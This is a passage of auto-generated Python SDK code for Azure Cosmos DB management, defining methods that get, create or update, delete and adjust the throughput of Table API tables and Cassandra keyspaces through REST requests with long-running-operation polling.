:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Table or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.cosmosdb.models.Table or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_table.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'tableName': self._serialize.url("table_name", table_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Table', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_table.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/table/tables/{tableName}'}
def _create_update_table_initial(
self, resource_group_name, account_name, table_name, resource, options, custom_headers=None, raw=False, **operation_config):
create_update_table_parameters = models.TableCreateUpdateParameters(resource=resource, options=options)
# Construct URL
url = self.create_update_table.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'tableName': self._serialize.url("table_name", table_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(create_update_table_parameters, 'TableCreateUpdateParameters')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Table', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create_update_table(
self, resource_group_name, account_name, table_name, resource, options, custom_headers=None, raw=False, polling=True, **operation_config):
"""Create or update an Azure Cosmos DB Table.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param table_name: Cosmos DB table name.
:type table_name: str
:param resource: The standard JSON format of a Table
:type resource: ~azure.mgmt.cosmosdb.models.TableResource
:param options: A key-value pair of options to be applied for the
request. This corresponds to the headers sent with the request.
:type options: dict[str, str]
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns Table or
ClientRawResponse<Table> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.cosmosdb.models.Table]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.cosmosdb.models.Table]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._create_update_table_initial(
resource_group_name=resource_group_name,
account_name=account_name,
table_name=table_name,
resource=resource,
options=options,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('Table', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
create_update_table.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/table/tables/{tableName}'}
def _delete_table_initial(
self, resource_group_name, account_name, table_name, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.delete_table.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'tableName': self._serialize.url("table_name", table_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [202, 204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def delete_table(
self, resource_group_name, account_name, table_name, custom_headers=None, raw=False, polling=True, **operation_config):
"""Deletes an existing Azure Cosmos DB Table.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param table_name: Cosmos DB table name.
:type table_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._delete_table_initial(
resource_group_name=resource_group_name,
account_name=account_name,
table_name=table_name,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
delete_table.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/table/tables/{tableName}'}
def get_table_throughput(
self, resource_group_name, account_name, table_name, custom_headers=None, raw=False, **operation_config):
"""Gets the RUs per second of the Table under an existing Azure Cosmos DB
database account with the provided name.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param table_name: Cosmos DB table name.
:type table_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Throughput or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.cosmosdb.models.Throughput or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_table_throughput.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'tableName': self._serialize.url("table_name", table_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Throughput', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_table_throughput.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/table/tables/{tableName}/settings/throughput'}
def _update_table_throughput_initial(
self, resource_group_name, account_name, table_name, resource, custom_headers=None, raw=False, **operation_config):
update_throughput_parameters = models.ThroughputUpdateParameters(resource=resource)
# Construct URL
url = self.update_table_throughput.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'tableName': self._serialize.url("table_name", table_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(update_throughput_parameters, 'ThroughputUpdateParameters')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Throughput', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def update_table_throughput(
self, resource_group_name, account_name, table_name, resource, custom_headers=None, raw=False, polling=True, **operation_config):
"""Update RUs per second of an Azure Cosmos DB Table.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param table_name: Cosmos DB table name.
:type table_name: str
:param resource: The standard JSON format of a resource throughput
:type resource: ~azure.mgmt.cosmosdb.models.ThroughputResource
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns Throughput or
ClientRawResponse<Throughput> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.cosmosdb.models.Throughput]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.cosmosdb.models.Throughput]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._update_table_throughput_initial(
resource_group_name=resource_group_name,
account_name=account_name,
table_name=table_name,
resource=resource,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('Throughput', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
update_table_throughput.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/table/tables/{tableName}/settings/throughput'}
def list_cassandra_keyspaces(
self, resource_group_name, account_name, custom_headers=None, raw=False, **operation_config):
"""Lists the Cassandra keyspaces under an existing Azure Cosmos DB
database account.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of CassandraKeyspace
:rtype:
~azure.mgmt.cosmosdb.models.CassandraKeyspacePaged[~azure.mgmt.cosmosdb.models.CassandraKeyspace]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list_cassandra_keyspaces.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def internal_paging(next_link=None):
request = prepare_request(next_link)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
header_dict = None
if raw:
header_dict = {}
deserialized = models.CassandraKeyspacePaged(internal_paging, self._deserialize.dependencies, header_dict)
return deserialized
list_cassandra_keyspaces.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/cassandra/keyspaces'}
def get_cassandra_keyspace(
self, resource_group_name, account_name, keyspace_name, custom_headers=None, raw=False, **operation_config):
"""Gets the Cassandra keyspaces under an existing Azure Cosmos DB database
account with the provided name.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param keyspace_name: Cosmos DB keyspace name.
:type keyspace_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: CassandraKeyspace or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.cosmosdb.models.CassandraKeyspace or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_cassandra_keyspace.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'keyspaceName': self._serialize.url("keyspace_name", keyspace_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('CassandraKeyspace', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_cassandra_keyspace.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/cassandra/keyspaces/{keyspaceName}'}
def _create_update_cassandra_keyspace_initial(
self, resource_group_name, account_name, keyspace_name, resource, options, custom_headers=None, raw=False, **operation_config):
create_update_cassandra_keyspace_parameters = models.CassandraKeyspaceCreateUpdateParameters(resource=resource, options=options)
# Construct URL
url = self.create_update_cassandra_keyspace.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'keyspaceName': self._serialize.url("keyspace_name", keyspace_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(create_update_cassandra_keyspace_parameters, 'CassandraKeyspaceCreateUpdateParameters')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('CassandraKeyspace', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create_update_cassandra_keyspace(
self, resource_group_name, account_name, keyspace_name, resource, options, custom_headers=None, raw=False, polling=True, **operation_config):
"""Create or update an Azure Cosmos DB Cassandra keyspace.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param keyspace_name: Cosmos DB keyspace name.
:type keyspace_name: str
:param resource: The standard JSON format of a Cassandra keyspace
:type resource: ~azure.mgmt.cosmosdb.models.CassandraKeyspaceResource
:param options: A key-value pair of options to be applied for the
request. This corresponds to the headers sent with the request.
:type options: dict[str, str]
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns CassandraKeyspace or
ClientRawResponse<CassandraKeyspace> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.cosmosdb.models.CassandraKeyspace]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.cosmosdb.models.CassandraKeyspace]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._create_update_cassandra_keyspace_initial(
resource_group_name=resource_group_name,
account_name=account_name,
keyspace_name=keyspace_name,
resource=resource,
options=options,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('CassandraKeyspace', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
create_update_cassandra_keyspace.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/cassandra/keyspaces/{keyspaceName}'}
def _delete_cassandra_keyspace_initial(
self, resource_group_name, account_name, keyspace_name, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.delete_cassandra_keyspace.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'keyspaceName': self._serialize.url("keyspace_name", keyspace_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [202, 204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def delete_cassandra_keyspace(
self, resource_group_name, account_name, keyspace_name, custom_headers=None, raw=False, polling=True, **operation_config):
"""Deletes an existing Azure Cosmos DB Cassandra keyspace.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param keyspace_name: Cosmos DB keyspace name.
:type keyspace_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._delete_cassandra_keyspace_initial(
resource_group_name=resource_group_name,
account_name=account_name,
keyspace_name=keyspace_name,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
delete_cassandra_keyspace.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/cassandra/keyspaces/{keyspaceName}'}
def get_cassandra_keyspace_throughput(
self, resource_group_name, account_name, keyspace_name, custom_headers=None, raw=False, **operation_config):
"""Gets the RUs per second of the Cassandra Keyspace under an existing
Azure Cosmos DB database account with the provided name.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param keyspace_name: Cosmos DB keyspace name.
:type keyspace_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Throughput or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.cosmosdb.models.Throughput or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_cassandra_keyspace_throughput.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'keyspaceName': self._serialize.url("keyspace_name", keyspace_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Throughput', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_cassandra_keyspace_throughput.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/cassandra/keyspaces/{keyspaceName}/settings/throughput'}
def _update_cassandra_keyspace_throughput_initial(
self, resource_group_name, account_name, keyspace_name, resource, custom_headers=None, raw=False, **operation_config):
update_throughput_parameters = models.ThroughputUpdateParameters(resource=resource)
# Construct URL
url = self.update_cassandra_keyspace_throughput.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'keyspaceName': self._serialize.url("keyspace_name", keyspace_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(update_throughput_parameters, 'ThroughputUpdateParameters')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Throughput', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def update_cassandra_keyspace_throughput(
self, resource_group_name, account_name, keyspace_name, resource, custom_headers=None, raw=False, polling=True, **operation_config):
"""Update RUs per second of an Azure Cosmos DB Cassandra Keyspace.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param keyspace_name: Cosmos DB keyspace name.
:type keyspace_name: str
:param resource: The standard JSON format of a resource throughput
